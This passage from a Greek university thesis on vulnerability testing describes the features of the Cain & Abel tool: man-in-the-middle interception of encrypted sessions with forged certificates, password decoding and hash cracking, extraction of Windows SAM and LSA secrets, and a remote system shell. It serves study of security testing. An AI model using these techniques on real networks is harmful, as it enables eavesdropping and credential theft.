• Πλήρες καταγραφή μιας SSH-1 συνόδου (APR-SSH-1)

Επιτρέπει τη σύλληψη όλων των δεδομένων τα οποία στέλνονται σε μια σύνοδο SSH-1

στο δίκτυο τόσο από την πλευρά του εξυπηρετητή όσο και από την πλευρά του κόμβου.

• Πλήρες καταγραφή μιας HTTPS συνόδου (APR-HTTPS)

Επιτρέπει τη σύλληψη και την αποκρυπτογράφηση όλων των δεδομένων που στέλνονται

σε μια σύνοδο HTTPS στο δίκτυο. Η δυνατότητα αυτή λειτουργεί σε συνδυασμό με τη

δυνατότητα Συλλογής Πιστοποιητικών (περιγράφεται παρακάτω). Μη έγκυρα

πιστοποιητικά χρησιμοποιούνται στην σύνοδο SSL, στην οποία έχει προηγηθεί hijacking.

Μέσω αυτής της δυνατότητας είναι πιθανή η αποκωδικοποίηση κρυπτογραφημένων

δεδομένων πριν αυτά φτάσουν στον πραγματικό προορισμό τους, πραγματοποιώντας μια

Man-in-the-Middle επίθεση. Ωστόσο ο κόμβος θα εντοπίσει αυτό το είδος της επίθεσης

επειδή το αρχείο πιστοποιητικού του εξυπηρετητή που εισάγεται στη σύνοδο SSL είναι

μη έγκυρο και παρόλο που είναι πολύ κοντά στο πραγματικό δεν φέρει την υπογραφή

μιας έμπιστης Αρχής Πιστοποίησης.

• Πλήρες καταγραφή μιας FTPS συνόδου (APR-FTPS)

Επιτρέπει τη σύλληψη και αποκρυπτογράφηση όλων των δεδομένων τα οποία

αποστέλλονται σε implicit FTPS συνόδους του δικτύου. Η δυνατότητα αυτή λειτουργεί

σε συνδυασμό με τη δυνατότητα Συλλογής Πιστοποιητικών (περιγράφεται παρακάτω).

• Πλήρες καταγραφή μιας POP3S συνόδου (APR-POP3S)

Επιτρέπει τη σύλληψη και αποκρυπτογράφηση όλων των δεδομένων τα οποία

αποστέλλονται σε implicit POP3S συνόδους του δικτύου. Η δυνατότητα αυτή λειτουργεί

σε συνδυασμό με τη δυνατότητα Συλλογής Πιστοποιητικών (περιγράφετε παρακάτω).

Page 120: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

120 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Πλήρες καταγραφή μιας IMAPS συνόδου (APR-IMAPS)

Επιτρέπει τη σύλληψη και αποκρυπτογράφηση όλων των δεδομένων τα οποία

αποστέλλονται σε implicit IMAPS συνόδους του δικτύου. Η δυνατότητα αυτή λειτουργεί

σε συνδυασμό με τη δυνατότητα Συλλογής Πιστοποιητικών (περιγράφετε παρακάτω).

• Πλήρες καταγραφή μιας LDAPS συνόδου (APR-LDAPS)

Επιτρέπει τη σύλληψη και αποκρυπτογράφηση όλων των δεδομένων τα οποία

αποστέλλονται σε implicit LDAPS συνόδους του δικτύου. Η δυνατότητα αυτή λειτουργεί

σε συνδυασμό με τη δυνατότητα Συλλογής Πιστοποιητικών (περιγράφετε παρακάτω).

• Συλλογή Πιστοποιητικών

Συλλέγει πιστοποιητικά από HTTPS, IMAPS, POP3S, LDAPS, FTPS ιστοσελίδες και τα

προετοιμάζει ώστε να χρησιμοποιηθούν από τα σχετικά APR-* sniffer φίλτρα. Η

δυνατότητα αυτή χρησιμοποιείται αυτόματα από το sniffer αλλά μπορεί να

χρησιμοποιηθεί και για χειροκίνητη δημιουργία μιας λίστα πλαστών προ-υπολογισμένων

αρχείων πιστοποιητικών. Τα μη έγκυρα πιστοποιητικά αποθηκεύονται στον υποκατάλογο

"Certs" του προγράμματος ενώ ο χρήστης έχει τη δυνατότητα να επεξεργαστεί αυτή τη

λίστα μη έγκυρων πιστοποιητικών και να επιλέξει ποιο θα χρησιμοποιηθεί κάθε φορά,

ανάλογα με το φίλτρο που χρησιμοποιείται.

• Σάρωση MAC Διευθύνσεων με χρήση του αποτυπώματος OUI (Organizationally

Unique Identifier)

Χρησιμοποιώντας το αποτύπωμα OUI, μπορεί να εικάσει τον τύπο της συσκευής από την

οποία προέρχεται μια διεύθυνση MAC. Ο σαρωτής MAC διευθύνσεων είναι ένας

γρήγορος αναλυτής διευθύνσεων ΙΡ σε MAC ο οποίος βασίζεται στα πακέτα

Αίτησης/Απόκρισης του πρωτοκόλλου ARP. Λαμβάνει ως είσοδο μια περιοχή από ΙΡ

διευθύνσεις του τρέχοντος υποδικτύου και αναλύει τις διευθύνσεις MAC που σχετίζονται

με αυτές τις ΙΡ διευθύνσεις. Ο σαρωτής περιλαμβάνει μια βάση δεδομένων OUI

παρέχοντας πληροφορίες για τους εν αντιστοιχία κατασκευαστές. Αυτή η δυνατότητα

είναι χρήσιμη για το γρήγορο προσδιορισμό των μεταγωγέων (switches), δρομολογητών

(routers) καθώς και των αναχωμάτων ασφαλείας του δικτύου. Αυτή η δυνατότητα μπορεί

να χρησιμοποιηθεί μόνο για ανάλυση διευθύνσεων MAC σε ένα τοπικό domain. • Εντοπισμός sniffers και IDS (Intrusion Detection Systems)

Εντοπίζει sniffers και συστήματα εντοπισμού εισβολών (IDS) που υπάρχουν σε ένα

δίκτυο.

Page 121: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

121 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Ανίχνευση Ασύρματων Δικτύων

Ανιχνεύει ασύρματα τοπικά δίκτυα τα οποία χρησιμοποιούν 802.11x. Αναλυτικότερα

μπορεί να διενεργήσει σάρωση για τον εντοπισμό σήματος ενός ασύρματου δικτύου, να

παρέχει πληροφορίες για τη MAC διεύθυνσή του, για το πότε εμφανίστηκε τελευταία

φορά, να εικάσει τον κατασκευαστή, να προσδιορίσει την ισχύ του σήματος και το όνομα

του δικτύου (SSID), να καθορίσει εάν χρησιμοποιεί WEP ή όχι και εάν το δίκτυο είναι

ένα Ad-Hoc ή δίκτυο υποδομής, να προσδιορίσει ποιο είναι το κανάλι λειτουργίας του

δικτύου και σε ποια ταχύτητα λειτουργεί το δίκτυο (π.χ. 11Mbps). Επίσης υποστηρίζεται

η παθητική σάρωση και το WEP IVs sniffing.

• Αποκωδικοποίηση αρχείων 802.11

Αποκωδικοποιεί αρχεία 802.11τα οποία έχουν συλλέγει από κάποιο άλλο πρόγραμμα

(wireshark, pcap) και τα οποία περιέχουν πλαίσιο κρυπτογράφησης WEP ή WPA-PSK.

• Αποκωδικοποίηση συνθηματικών βάσης δεδομένων Access (9x/2000/XP)

Αποκαλύπτει τα αποθηκευμένα και κρυπτογραφημένα συνθηματικά τα οποία

χρησιμοποιούνται για την προστασία των αρχείων .MDB που δημιουργούνται με

Microsoft Access 95/97/2000/XP.

• Αποκωδικοποίηση συνθηματικών Base64

Αποκωδικοποιεί τα κρυπτογραφημένα Base64 strings. Η κωδικοποίηση Base64

χρησιμοποιείται σε διάφορα πρότυπα πρωτοκόλλων Internet όπως HTTP, MIME, IMAP

για την κωδικοποίηση αυθαίρετων δεδομένων σε απλό κείμενο ASCII.

• Αποκωδικοποίηση συνθηματικών Cisco Type-7

Αποκωδικοποιεί κρυπτογραφημένα συνθηματικά τα οποία χρησιμοποιούνται σε αρχεία

διαμόρφωσης δρομολογητών και μεταγωγέων.

• Αποκωδικοποίηση συνθηματικών Cisco VPN Client

Αποκρυπτογραφεί συνθηματικά τα οποία είναι αποθηκευμένα σε αρχεία profiles (*.pcf)

από το λογισμικό Cisco VPN Client. Αυτά τα αρχεία περιέχουν όλες τις παραμέτρους

που χρειάζονται για τη σύνδεση σε ένα απομακρυσμένο δίκτυο μέσω VPN tunnels.

• Αποκωδικοποίηση συνθηματικών VNC

Αποκωδικοποιεί κρυπτογραφημένα συνθηματικά VNC από το μητρώο σε καθαρή μορφή

κειμένου.

Page 122: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

122 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Αποκωδικοποίηση συνθηματικών του Enterprise Manager

Αποκωδικοποιεί συνθηματικά τα οποία χρησιμοποιούνται από τον Microsoft SQL Server

Enterprise Manager (SQL 7.0 and 2000 supported)

• Αποκωδικοποίηση συνθηματικών του Remote Desktop

Αποκωδικοποιεί συνθηματικά τα οποία χρησιμοποιούνται από Remote Desktop Profiles

(.RPD αρχεία) και τα ο ποία δημιο υργούνται από το εργαλείο των Win d o ws “Remote

Desktop”.

• Αποκωδικοποίηση συνθηματικών του αρχείου PWL της Cache

Επιτρέπει την εμφάνιση όλων των συνθηματικών που αποθηκεύονται σε αρχεία PWL

στην cache είτε τα αρχεία είναι κλειδωμένε είτε όχι.

• Ανάκτηση Συνθηματικών

Επιτρέπει την ανάκτηση συνθηματικών τα οποία έχουν κρυπτογραφηθεί με χρήση

διαφόρων κρυπτογραφικών αλγορίθμων ή hash συναρτήσεων σε καθαρό κείμενο.

Υποστηρίζει επιθέσεις με χρήση λεξικού και εξαντλητικής αναζήτησης.

MD2, MD4, MD5, SHA1, SHA2 (256 bit), SHA2 (384 bit), SHA2 (512 bit),

RIPEMD160.

Οι τύποι hash που υποστηρίζει είναι:

PWL files, Cisco-IOS Type-5 enable passwords, Cisco PIX enable passwords, APOP-

MD5, CRAM-MD5, LM, LM + Challenge, NTLM, NTLM + Challenge, NTLM Session

Security, NTLMv2, RIPv2-MD5, OSPF-MD5, VRRP-HMAC-96, VNC-3DES, MS-

Kerberos5 Pre-Auth, RADIUS Shared Secrets, IKE Pre-Shared Keys, Microsoft SQL

Server 2000, Microsoft SQL Server 2005, Oracle, Oracle-TNS-DES, Oracle-TNS-3DES,

Oracle-TNS-AES128, Oracle-TNS-AES192, MySQL323, MySQLSHA1, SIP-MD5,

WPA-PSK, WPA-PSK-AUTH, CHAP-MD5, MS-CHAPv1, MS-CHAPv2.

Οι κρυπτογραφικοί αλγόριθμοι που υποστηρίζει είναι:

• Διενεργεί επιθέσεις κρυπτανάλυσης

Επιτρέπει την ανάκτηση συνθηματικών χρησιμοποιώντας τη μέθοδο ‘Faster

Cryptanalytic time – memory trade off’. Αυτή η τεχνική χρησιμοποιεί ένα σύνολο

πινάκων (Rainbow Tables) οι οποίοι περιέχουν προ-υπολογισμένα κρυπτογραφημένα

συνθηματικά, με σκοπό την βελτίωση των γνωστών μέχρι σήμερα μεθόδων trade-off και

την ταχύτερη ανάκτηση των συνθηματικών. Αν και αυτή είναι μια γρήγορη τεχνική

Page 123: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

123 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ανάκτησης συνθηματικών, είναι χρήσιμη μόνο για ορισμένα είδη κρυπτογραφημένων

συνθηματικών.

• Ανάκτηση WEP κλειδιών

Επιτρέπει την ανάκτηση WEP κλειδιών χρησιμοποιώντας τις μεθόδους επίθεσης Korek's

και PTW σε αρχεία που συλλέγονται από ασύρματα δίκτυα και τα οποία περιέχουν

αρκετά αρχικοποιημένα διανύσματα WEP. Η επίθεση Korek's WEP είναι μια στατιστική

μέθοδος για την ανάκτηση WEP κλειδιών η οποία βασίζεται σε μερικές αδυναμίες του

RC4 κρυπτογραφικού αλγορίθμου.

• Rainbowcrack-online client

Επιτρέπει την ανάκτηση συνθηματικών αλληλεπιδρώντας με τις on-line cracking

υπηρεσίες οι οποίες βασίζονται στην τεχνολογία Rainbow Table. Το Rainbowcrack-

online.com επιτρέπει σε επιχειρήσεις και χρήστες να αποκτούν πρόσβαση στις πολιτικές

συνθηματικών τους, παρέχοντας πρόσβαση στους από προ-παραγμένους πίνακες hash.

• Ανάκτηση συνθηματικών από NT Hash και History Hases

Ανάκτηση των NT hash συνθηματικών από τα αρχεία SAM (Security Account Manager) ανεξάρτητα από το εάν το Syskey είναι ενεργοποιημένο ή όχι. Επιπλέον έχει την

ικανότητα να ανακτά συνθηματικά από τις history hashes, οι οποίες μπορούν να

χρησιμοποιηθούν από τα Windows στα πλαίσια μιας πολιτικής ασφάλειας συνθηματικών,

ώστε να αποτρέπονται οι χρήστες να χρησιμοποιούν συνθηματικά που είχαν

χρησιμοποιηθεί στο παρελθόν.

• Αποκωδικοποίηση του Syskey

Μπορεί να ανακτήσει το Boot Key (Startup Key), το οποίο παράγεται από την βοηθητική

εφαρμογή SYSKEY, από το τοπικό μητρώο ή τα "off-line" SYSTEM αρχεία. Το Boot

Key είναι η πληροφορία που χρησιμοποιείται από το πρόγραμμα SYSKEY.EXE για την

κρυπτογράφηση των hashes συνθηματικών πριν αυτά αποθηκευτούν στα αρχεία της

βάσης δεδομένων SAM.

• Ανάκτηση Hashes από την MSCACHE

Μπορεί να ανακτήσει τα MSCACHE hashes συνθηματικά τα οποία βρίσκονται

αποθηκευμένα στο μητρώο. Τα Windows αποθηκεύουν ένα αντίγραφο των

συνθηματικών εισόδου ενός domain στο τοπικό μητρώο. Αυτό επιτρέπει στους χρήστες

να πραγματοποιούν είσοδο στο σύστημα τοπικά ακόμα και αν ο domain controller είναι

Page 124: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

124 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

off-line ή μη διαθέσιμος. Το Cain αποκρυπτογραφεί τις hashes της κρυφής μνήμης και τις

προετοιμάζει για επιθέσεις ανάκτησης συνθηματικών με χρήση λεξικού ή εξαντλητικής

αναζήτησης.

• Ανάκτηση συνθηματικών από το Wireless Zero Configuration

Επιτρέπει την ανάκτηση κλειδιών ασύρματων δικτύων τα οποία αποθηκεύονται από την

υπηρεσία Windows Wireless Configuration. Τα WEP κλειδιά αποκωδικοποιούνται

αυτόματα. Τα κλειδιά WPA-PSK εμφανίζονται στη δεκαεξαδική τους μορφή εξαιτίας της

χρήσης της συνάρτηση one-way hashing του αλγορίθμου SHA1.

• Εξαγωγή συνθηματικών του Microsoft SQL Server 2000 μέσω ODBC

Συνδέεται σε έναν SQL server μέσω ODBC και εξάγει όλους το υς χρήστες και τα

συνθηματικά από την βάση δεδομένων. Αυτή η λειτουργία απαιτεί δικαιώματα

διαχειριστή στον εξυπηρετητή στόχο που εκτελείται η βάση δεδομένων.

• Εξαγωγή συνθηματικών της Oracle μέσω ODBC

Συνδέεται σε έναν Oracle server μέσω ODBC και εξάγει όλους το υς χρήστες και τα

συνθηματικά από την βάση δεδομένων. Αυτή η λειτουργία απαιτεί δικαιώματα

διαχειριστή στον εξυπηρετητή στόχο που εκτελείται η βάση δεδομένων και την

εγκατάσταση του Oracle ODBC client.

• Εξαγωγή συνθηματικών του MySQL μέσω ODBC

Συνδέεται σε έναν MySQL server μέσω ODBC και εξάγει όλο υς τους χρήστες και τα

συνθηματικά από την βάση δεδομένων. Αυτή η λειτουργία απαιτεί δικαιώματα

διαχειριστή στον εξυπηρετητή στόχο που εκτελείται η βάση δεδομένων και την

εγκατάσταση του MySQL ODBC client.

• Αποκαλύπτει συνθηματικά που κρύβονται πίσω από αστερίσκους

Μπορεί να αποκαλύψει τα συνθηματικά που κρύβονται με αστερίσκους στα παράθυρα

διαλόγου. Αυτό επιτυγχάνεται με την τεχνική "DLL injection". Το Cain υποστηρίζει τα

περισσότερα πρότυπα πλαισίων κειμένου συνθηματικών (password text-boxes). Ωστόσο

μερικές εφαρμογές, για λόγους ασφάλειας, δεν αποθηκεύουν τα συνθηματικά πίσω από

αστερίσκους. Στην περίπτωση αυτή το Cain δεν μπορεί να εμφανίσει αυτά τα

συνθηματικά.

Page 125: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

125 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Υπολογισμός κλειδιού RSA

Μπορεί να υπολογίσει το κλειδί RSA αν του δοθεί το token's .XML αρχείο

ενεργοποίησης.

• Υπολογισμός συνάρτησης Hash

Μπορεί να παράγει την hash τιμή ενός δοθέντος κειμένου. Υποστηρίζει τους πιο

συνηθισμένους hashing αλγορίθμους όπως οι MD2, MD4, MD5, SHA-1 καθώς και

μερικούς εξειδικευμένους όπως οι LM, NTLM, MySQL323 και Cisco PIX

• Εμφανίζει την κατάσταση των θυρών

Εμφανίζει την κατάσταση των τοπικών θυρών όπως και το εργαλείο των Windows

"netstat.exe". Αναλυτικότερα, εμφανίζει όλες τις παραμέτρους της σύνδεσης όπως τον

τύπο του πρωτοκόλλου, τις τοπικές διευθύνσεις, τον αριθμό των θυρών, τις

απομακρυσμένες διευθύνσεις και την κατάσταση σύνδεσης (μόνο TCP). Επίσης στα

Windows XP, εμφανίζεται το όνομα αρχείου της διαδικασίας που σχετίζεται με τις θύρες

TCP και UDP.

• Δυνατότητα Traceroute

Το Cain διαθέτει μια βελτιωμένη λειτουργία traceroute η οποία χρησιμοποιώντας τα

πρωτόκολλα TCP, UDP και ICMP παρέχει πληροφορίες για τον πάροχο υπηρεσιών.

• Δυνατότητα αποστολής/λήψης του αρχείου διαμόρφωσης σε συσκευές Cisco

Το Cain επιτρέπει την αποστολή ή τη λήψη του αρχείου διαμόρφωσης από μια ή σε μια

συσκευή Cisco (IP ή όνομα κόμβου) μέσω SNMP/TFTP. Υποστηρίζει μεταγωγείς και

δρομολογητές οι οποίοι χρησιμοποιούν τόσο το παλιό OLD-CISCO-SYSTEM-MIB ή το

νέο CISCO-CONFIG-COPY-MIB

Δυνατότητες του Abel

• Παρέχει Remote system shell σε ένα απομακρυσμένο μηχάνημα

Η απομακρυσμένη κονσόλα του Abel παρέχει ένα απομακρυσμένο διαδραστικό

παράθυρο (εφεξής shell) σε ένα απομακρυσμένο μηχάνημα για τη διαχείρισή του. Η

υπηρεσία Abel εκτελείται στον απομακρυσμένο υπολογιστή στο Local System Account.

Κάθε εντολή που αποστέλλεται στο τερματικό εκτελείται με τα ίδια δικαιώματα

πρόσβασης αυτού του λογαριασμού. Το τερματικό του Abel μπορεί να χρησιμοποιηθεί

για την προσθήκη χρηστών, την απαρίθμηση δικτύων, την εκτέλεση ping σε

απομακρυσμένους κόμβους, κτλ.

Page 126: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

126 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Απομακρυσμένη Διαχείριση πίνακα δρομολόγησης

Επιτρέπει την απομακρυσμένη διαχείριση του πίνακα δρομολόγησης, όπως το Cain.

• Εμφάνιση κατάστασης θυρών απομακρυσμένου συστήματος

Εμφανίζει την κατάσταση των τοπικών θυρών στο απομακρυσμένο σύστημα, όπως το

Cain.

• Ανάκτηση συνθηματικών από NT Hash και History Hases

Ανακτά τα hash NT συνθηματικά από το αρχείο SAM ανεξάρτητα από το αν είναι

ενεργοποιημένο ή όχι το Syskey. Λειτουργεί όπως το Cain.

• Αποκάλυψη του περιεχομένου των Local Security Authority Secrets στο

απομακρυσμένο σύστημα

Αποκαλύπτει τα περιεχόμενα του Local Security Authority Secrets στο απομακρυσμένο

σύστημα, όπως το Cain.

4.4.3 Περιορισμοί και παρενέργειες

Το Cain & Abel, αν και είναι ένα χρήσιμο εργαλείο για τον εντοπισμό ευπαθειών σε ένα

σύστημα, έχει ορισμένους περιορισμού ενώ ενδέχεται να προκαλέσει κάποιες παρενέργειες

στο σύστημα που ελέγχεται. Μπορούμε να διακρίνουμε τους εξής βασικούς περιορισμούς:

• ορισμένες λειτουργίες του απαιτούν δικαιώματα διαχειριστή στο μηχάνημα όπου

διενεργείται ο έλεγχος

• ορισμένες λειτουργίες του δεν μπορούν να εκτελεστούν αν υπάρχουν δικτυακοί

περιορισμοί όπως λίστες ελέγχου προσπέλασης (Access Control Lists - ACLs), κανόνες

αναχωμάτων για τα πρωτόκολλα SNMP/TFTP, κλπ, στο μηχάνημα όπου διενεργείται ο

έλεγχος

• δεν μπορεί να ανακτήσει συνθηματικά εκτός της κύριας βάσης δεδομένων

• ορισμένες λειτουργίες απαιτούν την εκτέλεσή του στο ίδιο μηχάνημα στο οποίο

δημιουργήθηκε ένα συνθηματικό και με τον ίδιο λογαριασμό χρήστη

• ορισμένες λειτουργίες εκτελούνται μόνο μέσα σε ένα domain εκπομπής εξαιτίας της

λειτουργίας των πακέτων ARP τα οποία δεν μπορούν ναν διέλθουν από δρομολογητές ή

VLANs

Page 127: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

127 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• δεν μπορεί να χρησιμοποιηθεί για την επανεγγραφή των DNS Replies που προορίζονται

για τον τοπικό κόμβο εξαιτίας του Winpcap driver

• δεν μπορεί να λειτουργήσει ως proxy server εξαιτίας του Winpcap driver ο οποίος δεν

μπορεί να αποκρυπτογραφήσει τις HTTPS, FTPS, IMAPS, LDAPS, POP3S και SSH1

συνόδους οι οποίες εκκινούνται από τον τοπικό κόμβο

• τα IDS (Intrusion Detection Systems) συστήματα εντοπίζουν το εργαλείο ως απειλή

• στην SSL Man In The Middle επίθεση ορισμένες ιστοσελίδες σταματούν να λειτουργούν

κατά τη διαδικασία συλλογής των αυθεντικών πιστοποιητικών και της αποστολής μη

έγκυρων στο χρήστη με αποτέλεσμα να μην μπορούν να αποκρυπτογραφηθούν τα

δεδομένα

• σε μερικές ιστοσελίδες δεν εμφανίζονται οι κωδικοί γιατί ο parser των δεδομένων δεν

είναι ο κατάλληλος για αυτές

• η παρουσίαση των αποτελεσμάτων δεν είναι ιδιαίτερα φιλική προς το χρήστη ενώ τα

αποτελέσματα δεν μπορούν να εκτυπωθούν ή να αντιγραφούν

• σε ορισμένες περιπτώσεις απαιτείται επιπλέον εξοπλισμός, όπως για παράδειγμα για τη

συλλογή όλων των πακέτων που εκπέμπονται σε ένα WLAN και την μετάδοση νέων

πακέτων τα Windows απαιτούν τον AirPCap TX adapter

• είναι ένα αποκλειστικά Windows εργαλείο

Το Cain & Abel, εκτός του ότι είναι ένα χρήσιμο εργαλείο, διαθέτει και κάποιες ευπάθειες

τις οποίες μπορεί να εκμεταλλευτεί ένας επιτιθέμενος με αποτέλεσμα να επιφέρει συνέπειες

στο σύστημα που είναι εγκατεστημένο. Μια σημαντική ευπάθειά του είναι το stack – based

buffer overflow το οποίο προκαλείται από την κωδικοποίηση συγκεκριμένων RDP αρχείων.

Η επιτυχής εκμετάλλευση αυτής της ευπάθειας μπορεί να οδηγήσει στην εκτέλεση

αυθαιρέτου κώδικα και να οδηγήσει στην κατάρρευση του συστήματος. Stack – based buffer

overflow μπορεί να προκληθεί λόγω ευπάθειας στην εισαγωγή Cisco IOS MD5 hashes. Η

αποτυχημένη εκμετάλλευση αυτής της ευπάθειας μπορεί να οδηγήσει σε άρνηση παροχής

υπηρεσίας (Denial Of Service). Η ευπάθεια αυτή εντοπίζεται στην έκδοση 4.9.24 και σε

προηγούμενές της.59

59 http://secunia.com/advisories/32794/ & http://www.securitytube.net/Cain-and-Abel-Malformed-RDP-File-Buffer-Overflow-Vulnerability-video.aspx & http://www.vupen.com/english/advisories/2009/0035

Page 128: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

128 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.4.4 Παρουσίαση - Τρόπος λειτουργίας

Το Cain, που αποτελεί το πρώτο μέρος της εφαρμογής, είναι γραμμένο σε C/C++ αν και ένα

μεγάλο μέρος του κώδικα έχει βελτιστοποιηθεί με Assembler για λόγους απόδοσης. Κλάσεις

MFC και βιβλιοθήκες OpenSSL είναι συνδεδεμένες με την εφαρμογή και αν και αυξάνουν

το μέγεθος αρχείων, εξαλείφουν την ανάγκη διαμοιρασμού των κοινών DLLs. Η ανάπτυξή

του σε ένα απλό γραφικό περιβάλλον Windows αποσκοπεί στην συγκέντρωση διαφόρων

τεχνικών Hacking που εστιάζουν στην ανάκτηση συνθηματικών και πιστοποιητικών

αυθεντικοποίησης από διάφορες πηγές.

Εικόνα 4.5: Κύρια οθόνη του Cain

Η διεπαφή χρήστη αποτελείται από λίστες, ετικέτες, μπάρες εργαλείων και διαλόγου. Οι

λίστες περιέχουν παρόμοιο είδος πληροφοριών όπως συνθηματικά, ονόματα κόμβων, hashes

και άλλες παραμέτρους ενώ οι ετικέτες χρησιμοποιούνται για την εναλλαγή λειτουργιών. Η

μπάρα εργαλείων του sniffer περιέχει μόνο δύο κουμπιά για την ενεργοποίηση ή

απενεργοποίηση του sniffer και της λειτουργίας APR, καθώς και την κεντρική μπάρα

εργαλείων για τις υπόλοιπες εντολές αλληλεπίδρασης με το πρόγραμμα. Τα κουμπιά μπλε

χρώματος "+" και ο κάδος ανακύκλωσης έχουν την έννοια της προσθήκης ή της αφαίρεσης

κάποιου αντικειμένου από την τρέχουσα λίστα, αν και επιτελούν διαφορετικές λειτουργίες

ανάλογα με τη λίστα που χρησιμοποιείται.

Μετά την εγκατάσταση του Cain είναι απαραίτητο να γίνουν κάποιες ρυθμίσεις παραμέτρων

του προγράμματος. Αυτές οι ρυθμίσεις μπορούν να πραγματοποιηθούν από το πλαίσιο

διαλόγου configuration.

Page 129: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

129 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Το πλαίσιο διαλόγου configuration περιέχει έξι (6) ετικέτες ρυθμίσεων. Αναλυτικά:

Εικόνα 4.6: Οθόνη Διαμόρφωσης του Cain

Sniffer Tab
